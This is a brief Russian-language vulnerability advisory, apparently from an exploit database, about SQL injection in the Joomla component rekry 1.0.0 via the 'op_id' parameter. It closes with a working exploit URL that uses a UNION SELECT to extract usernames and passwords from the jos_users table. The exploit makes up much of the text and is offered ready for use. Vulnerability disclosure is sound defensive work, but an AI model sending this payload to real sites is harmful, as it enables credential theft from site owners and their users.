Программа: Joomla Component rekry 1.0.0
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «op_id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://www.target.com/index.php?option=com_rekry&Itemid= 60&rekryview=view&op_id=-1/**/union/**/select/**/1,concat(username, 0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 %20from%20jos_users+limit+1,1--
